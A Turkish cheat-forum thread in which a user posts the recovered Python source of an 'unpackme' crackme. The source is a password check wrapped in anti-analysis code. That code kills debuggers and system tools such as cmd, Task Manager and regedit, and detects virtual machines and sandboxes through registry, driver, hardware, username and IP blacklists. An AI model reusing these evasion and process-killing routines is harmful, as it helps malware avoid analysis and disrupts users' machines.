de3rfa
Banned
- Katılım
- 28 Eki 2023
- Mesajlar
- 196
- Beğeniler
- 31
kanka ne bulduysa eklemiş injection falanda var malware muhtelemen
-
Reklam vermek için veya iletişim: [email protected] | Discord: cheatglobal.com -
Python unpackme source code çıkartma 0/10
- Konuyu Başlatan ScripterKid
- Başlangıç tarihi
- Katılım
- 19 Ocak 2025
- Mesajlar
- 2,352
- Beğeniler
- 385
- Yaş
- 126
- İletişim
yok kanka valo hile ama arudino SADSDASKDASDNASNDLASNDAKSDNAKLSDASDAS
de3rfa
Banned
- Katılım
- 28 Eki 2023
- Mesajlar
- 196
- Beğeniler
- 31
tamam aknka inanma sen calıstır kodu
zynloop
Master Üye
- Katılım
- 5 Haz 2025
- Mesajlar
- 923
- Beğeniler
- 280
Başlıktaki gibi; 0/10 ekstra olarak kendi obfimi kodladım demişsiniz, maalesef öyle bir şey gözükmüyor. 
Challenge Tamamlandı;
Challenge Tamamlandı;
Linkleri görebilmek için kayıt olmanız gerekmektedir
Python:
import os
import sys
import glob
import ctypes
import subprocess
import threading
from win32gui import GetWindowText, EnumWindows
from win32process import GetWindowThreadProcessId
from psutil import Process, process_iter, virtual_memory, cpu_count, disk_usage
from requests import get
from winreg import HKEY_LOCAL_MACHINE, OpenKey, CloseKey, QueryValueEx
# Çıkış fonksiyonu
def exit_program(reason):
print(f"[!] {reason}")
exec(type((lambda: 0).__code__)(0, 0, 0, 0, 0, 0, b'\x053', (), (), (), '', '', 0, b''))
# Debugger pencere kontrolü
def check_windows():
def winEnumHandler(hwnd, ctx):
title = GetWindowText(hwnd).lower()
blacklist = {'proxifier', 'graywolf', 'extremedumper', 'zed', 'exeinfope', 'dnspy',
'titanHide', 'ilspy', 'titanhide', 'x32dbg', 'codecracker', 'simpleassembly',
'process hacker 2', 'pc-ret', 'http debugger', 'process monitor', 'debug',
'reverse', 'simpleassemblyexplorer', 'process', 'de4dotmodded', 'sharpod',
'folderchangesview', 'fiddler', 'die', 'pizza', 'Crâck', 'strongod', 'ida -',
'brute', 'dump', 'StringDecryptor', 'wireshark', 'debugger', 'httpdebugger',
'gdb', 'kdb', 'x64_dbg', 'windbg', 'x64netdumper', 'petools', 'scyllahide',
'megadumper', 'reversal', 'ksdumper', 'dbgclr', 'HxD', 'monitor', 'peek',
'ollydbg', 'http', 'wpe pro', 'dbg', 'httpanalyzer', 'httpdebug', 'PhantOm',
'kgdb', 'james', 'x32_dbg', 'proxy', 'phantom', 'mdbg', 'system explorer',
'de4dot', 'x64dbg', 'protection_id', 'charles', 'systemexplorer', 'pepper',
'hxd', 'procmon64', 'ghidra', 'xd', '0harmony', 'hacker', 'process hacker',
'SAE', 'mdb', 'checker', 'harmony', 'PETools', 'scyllaHide', 'x96dbg',
'systemexplorerservice', 'folder', 'mitmproxy', 'dbx', 'sniffer', 'http toolkit'}
if title in blacklist:
pid = GetWindowThreadProcessId(hwnd)
if type(pid) == int:
try: Process(pid).terminate()
except: pass
else:
for process in pid:
try: Process(process).terminate()
except: pass
exit_program(f'Debugger tespit edildi: {title}')
while True:
try:
EnumWindows(winEnumHandler, None)
except:
pass
# IP kontrolü
def check_ip():
blacklisted = {'88.132.227.238', '79.104.209.33', '92.211.52.62', '20.99.160.173',
'188.105.91.173', '64.124.12.162', '195.181.175.105', '194.154.78.160',
'109.74.154.92', '88.153.199.169', '34.145.195.58', '178.239.165.70',
'88.132.231.71', '34.105.183.68', '195.74.76.222', '192.87.28.103',
'34.141.245.25', '35.199.6.13', '34.145.89.174', '34.141.146.114',
'95.25.204.90', '87.166.50.213', '193.225.193.201', '92.211.55.199', None}
try:
ip = get('https://api64.ipify.org/', timeout=5).text.strip()
if ip in blacklisted:
exit_program('IP adresi kara listede')
except:
pass
# VM süreç kontrolü
def check_vm_processes():
vm_processes = ['VMwareService.exe', 'VMwareTray.exe', 'VBoxService.exe', 'VBoxTray.exe']
for proc in process_iter():
try:
if proc.name() in vm_processes:
exit_program('VM süreci tespit edildi')
except:
pass
# Registry kontrolü
def check_registry():
try:
if system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul") != 1:
exit_program('VM registry anahtarı tespit edildi')
handle = OpenKey(HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
try:
reg_val = QueryValueEx(handle, '0')[0]
if "VMware" in reg_val or "VBOX" in reg_val:
exit_program('VM disk tespit edildi')
finally:
CloseKey(handle)
except:
pass
# DLL kontrolü
def check_dll():
vm_dlls = ["System32\\vmGuestLib.dll", "vboxmrxnp.dll", "System32\\drivers\\vmmouse.sys"]
system_root = os.environ.get("SystemRoot", "C:\\Windows")
for dll in vm_dlls:
if os.path.exists(os.path.join(system_root, dll)):
exit_program('VM DLL tespit edildi')
# Sistem özellikleri kontrolü
def check_specs():
try:
ram_gb = int(str(virtual_memory()[0]/1024/1024/1024).split(".")[0])
disk_gb = int(str(disk_usage('/')[0]/1024/1024/1024).split(".")[0])
cpu = int(cpu_count())
if ram_gb <= 4:
exit_program('Yetersiz RAM')
if disk_gb <= 50:
exit_program('Yetersiz disk alanı')
if cpu <= 1:
exit_program('Yetersiz CPU')
except:
pass
# KVM sürücü kontrolü
def check_kvm():
bad_drivers = ["balloon.sys", "netkvm.sys", "vioinput*", "viofs.sys", "vioser.sys"]
system32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
for driver in bad_drivers:
if glob.glob(os.path.join(system32, driver)):
exit_program('KVM sürücüsü tespit edildi')
# Ekran boyutu kontrolü
def check_screen():
try:
user32 = ctypes.windll.user32
width = user32.GetSystemMetrics(0)
height = user32.GetSystemMetrics(1)
if width < 800 or height < 600:
exit_program('Şüpheli ekran boyutu')
except:
pass
# Parallels kontrolü
def check_parallels():
parallels_drivers = ["prl_sf", "prl_tg", "prl_eth"]
sys32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
try:
files = os.listdir(sys32)
for file in files:
for driver in parallels_drivers:
if driver in file.lower():
exit_program('Parallels tespit edildi')
except:
pass
# QEMU kontrolü
def check_qemu():
qemu_drivers = ["qemu-ga", "qemuwmi"]
sys32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
try:
files = os.listdir(sys32)
for file in files:
for driver in qemu_drivers:
if driver in file.lower():
exit_program('QEMU tespit edildi')
except:
pass
# Son dosya aktivitesi kontrolü
def check_recent_files():
try:
recdir = os.path.join(os.getenv('APPDATA'), 'microsoft', 'windows', 'recent')
files = os.listdir(recdir)
if len(files) < 20:
exit_program('Şüpheli dosya aktivitesi')
except:
pass
# Triage sandbox kontrolü
def check_triage():
try:
result = subprocess.check_output(['wmic', 'diskdrive', 'get', 'model'], text=True)
if "DADY HARDDISK" in result or "QEMU HARDDISK" in result:
exit_program('Sandbox disk tespit edildi')
except:
pass
# USB kontrolü
def check_usb():
try:
cmd = subprocess.Popen(['reg', 'query', 'HKLM\\SYSTEM\\ControlSet001\\Enum\\USBSTOR'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output, err = cmd.communicate()
if not err:
lines = output.decode('utf-8').split("\n")
usb_count = sum(1 for line in lines if line.strip().startswith("HKEY_LOCAL_MACHINE"))
if usb_count == 0:
exit_program('USB cihaz bulunamadı')
except:
pass
# Kullanıcı adı kontrolü
def check_username():
blacklisted = ["johnson", "miller", "malware", "maltest", "currentuser", "sandbox",
"virus", "john doe", "test user", "sand box", "wdagutilityaccount"]
username = os.getenv("USERNAME", "").lower()
if username in blacklisted:
exit_program('Şüpheli kullanıcı adı')
# GPU kontrolü
def check_gpu():
try:
cmd = subprocess.Popen(['wmic', 'path', 'win32_VideoController', 'get', 'name'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, err = cmd.communicate()
if not err:
output_lower = output.lower()
if b"virtualbox" in output_lower or b"vmware" in output_lower:
exit_program('VM ekran kartı tespit edildi')
except:
pass
# VM artifacts kontrolü
def check_vm_artifacts():
bad_files = ["VBoxMouse.sys", "VBoxGuest.sys", "VBoxSF.sys", "VBoxVideo.sys",
"vmmouse.sys", "vboxogl.dll"]
bad_dirs = [r'C:\Program Files\VMware', r'C:\Program Files\oracle\virtualbox guest additions']
system32 = os.getenv("SystemRoot", "") + r'\System32'
try:
files = glob.glob(os.path.join(system32, "*"))
for file_path in files:
file_name = os.path.basename(file_path).lower()
if file_name in [f.lower() for f in bad_files]:
exit_program('VM dosyası tespit edildi')
except:
pass
for bad_dir in bad_dirs:
if os.path.exists(bad_dir):
exit_program('VM dizini tespit edildi')
# Sürekli süreç kontrolü
def continuous_process_check():
blacklist = ["http toolkit.exe", "httpdebuggerui.exe", "wireshark.exe", "fiddler.exe",
"charles.exe", "regedit.exe", "cmd.exe", "taskmgr.exe", "processhacker.exe",
"ida64.exe", "ollydbg.exe", "x96dbg.exe", "x32dbg.exe", "x64dbg.exe"]
while True:
try:
for proc in process_iter():
try:
if proc.name().lower() in blacklist:
proc.kill()
except:
pass
except:
pass
# Tüm kontrolleri başlat
def initialize_protection():
checks = [
check_ip, check_vm_processes, check_registry, check_dll, check_specs,
check_kvm, check_screen, check_parallels, check_qemu, check_recent_files,
check_triage, check_usb, check_username, check_gpu, check_vm_artifacts
]
# Hızlı kontroller
for check in checks:
try:
check()
except:
pass
# Sürekli kontroller thread'lerde
threading.Thread(target=check_windows, daemon=True).start()
threading.Thread(target=continuous_process_check, daemon=True).start()
# Ana program
if __name__ == "__main__":
# Koruma sistemini başlat
initialize_protection()
# Şifre kontrolü
while True:
try:
sifre = input("Şifre girin: ")
if sifre == "2331563":
print("Doğru!")
break
else:
print("Şifre yanlış, tekrar denemek için herhangi bir tuşa basın")
input()
except:
exit_program("Hata oluştu")
Son düzenleme: